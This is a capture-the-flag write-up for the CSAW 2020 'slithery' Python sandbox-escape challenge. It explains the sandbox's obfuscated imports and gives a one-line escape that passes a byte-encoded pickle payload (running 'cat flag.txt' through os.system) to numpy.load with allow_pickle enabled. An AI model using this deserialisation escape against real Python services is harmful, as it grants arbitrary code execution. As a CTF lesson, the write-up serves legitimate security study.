Tags: python pwn jail 


# slithery

Author: [roerohan](https://github.com/roerohan) and [thebongy](https://github.com/thebongy)

# Requirements

- Python

# Source

- [sandbox.py](./sandbox.py)

Setting up a new coding environment for my data science students. Some of them are l33t h4ck3rs that got RCE and crashed my machine a few times :(. Can you help test this before I use it for my class? Two sandboxes should be better than one...

nc pwn.chal.csaw.io 5011

# Exploitation

This is a python jail escape challenge. In the source file, you see the following lines:

final_cmd = """
uOaoBPLLRN = open("sandbox.py", "r")
uDwjTIgNRU = int(((54 * 8) / 16) * (1/3) - 8)
ORppRjAVZL = uOaoBPLLRN.readlines()[uDwjTIgNRU].strip().split(" ")
bAfGdqzzpg = ORppRjAVZL[-uDwjTIgNRU]
HrjYMvtxwA = getattr(__import__(AAnBLJqtRv), bAfGdqzzpg)
RMbPOQHCzt = __builtins__.__dict__[HrjYMvtxwA(b'X19pbXBvcnRfXw==').decode('utf-8')](HrjYMvtxwA(b'bnVtcHk=').decode('utf-8'))\n""" + command

Once you decode these, they basically translate to:

sandbox = open("sandbox.py", "r")
l = ['from', 'base64', 'import', 'b64decode']
base64 = l[1]
b64decode = l[-1]
base64_b64decode = getattr(__import__(base64), b64decode)
numpy = __builtins__.__dict__[base64_b64decode(b'X19pbXBvcnRfXw==').decode('utf-8')](base64_b64decode(b'bnVtcHk=').decode('utf-8'))

So you can see which variable stores what. Now, the script executes the command you entered along with the list of commands shown above, with obfuscated variable names.

There is of course a blacklist, part of which have written in [blacklist.py](./blacklist.py). We notice `numpy` has been imported. `numpy` has a function `numpy.load()`, which can take load a pickle payload from a file, given the option `allow_pickle=True`. We know that we can execute RCE using pickle payloads, which is exactly what we have to do.

The challenge however is to create a `file like object` for `numpy.load()`, since you don't have access to write a file on the system. Reading the documentation for `numpy.load()` you find out that a `file like object` is any object which has the attributes `read`, `readline`, and `seek`. You don't need to implement these properly, but they must return the expected type of data. We pass the pickle payload as bytes in the `lambda x` function. Here's how you can do all of this in 1 line, keeping the blacklist in consideration.

$ nc pwn.chal.csaw.io 5011
EduPy 3.8.2
>>> obj=lambda: None; setattr(obj, HrjYMvtxwA('cmVhZA==').decode(), lambda x: bytes([128, 3, 99, 112, 111, 115, 105, 120, 10, 115, 121, 115, 116, 101, 109, 10, 113, 0, 88, 12, 0, 0, 0, 99, 97, 116, 32, 102, 108, 97, 103, 46, 116, 120, 116, 113, 1, 133, 113, 2, 82, 113, 3, 46])); setattr(obj, HrjYMvtxwA('c2Vlaw==').decode(), lambda x,y:x); setattr(obj, HrjYMvtxwA('cmVhZGxpbmU=').decode(), lambda x: bytes([128, 3, 99, 112, 111, 115, 105, 120, 10, 115, 121, 115, 116, 101, 109, 10, 113, 0, 88, 12, 0, 0, 0, 99, 97, 116, 32, 102, 108, 97, 103, 46, 116, 120, 116, 113, 1, 133, 113, 2, 82, 113, 3, 46]));RMbPOQHCzt.load(obj, allow_pickle=True)

The flag is:


Original writeup (https://github.com/csivitu/CTF-Write-ups/tree/master/CSAW%20Quals%202020/Pwn/slithery).